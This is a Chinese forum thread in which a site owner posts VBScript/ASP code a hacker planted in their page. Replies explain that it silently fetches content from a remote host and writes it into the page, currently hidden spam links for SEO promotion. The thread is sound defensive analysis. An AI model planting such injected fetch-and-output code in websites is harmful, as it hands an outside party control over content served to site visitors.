日期:2014-05-17  浏览次数:20967 次

一个黑客在我们的网页里嵌入的一段代码,帮忙看下什么意思
VB code
Dim lvurl
    Dim lvcontent
    Dim lvxmlhttp
    On Error Resume Next
    lvurl = "http://jzb365.com/f/qdlib.php"
    set lvxmlhttp = CreateObject("MSXML2.Serverxmlhttp")
    On Error Resume Next
    if lvxmlhttp is nothing then
       set lvxmlhttp = Server.CreateObject("WinHttp.WinHttpRequest.5.1")
    end if
    On Error Resume Next
    if lvxmlhttp is nothing then
       set lvxmlhttp = CreateObject("MSXML2.Serverxmlhttp.4.0")
    end if
    if lvxmlhttp is nothing then
       'cannot load xml component
    else
      lvxmlhttp.open "GET", lvurl, false
      lvxmlhttp.send ""
    if lvxmlhttp.Status = "200" then
      lvcontent = lvxmlhttp.responseText
    if InStr(lvcontent, "<Error >") > 0 then
    If Err Then Response.write Err.Description 
       lvcontent = ""
    end if
      Response.write lvcontent
    end if
      set lvxmlhttp = nothing
    end if 


------解决方案--------------------
远程加载 http://jzb365.com/f/qdlib.php 里的内容,并显示出来
------解决方案--------------------
他现在是在你的页面隐藏加载
<a href="http://www.jiasufz.com">晴天辅助</a>
<a href="http://www.zgyongchi.com/">游泳池设备</a>
以后保不准会换其它的
其实目的应该主要就是广告推广


------解决方案--------------------
广告吧

在你的服务器端请求其它网站下面的页面,然后输出结果

类似与asp小偷程序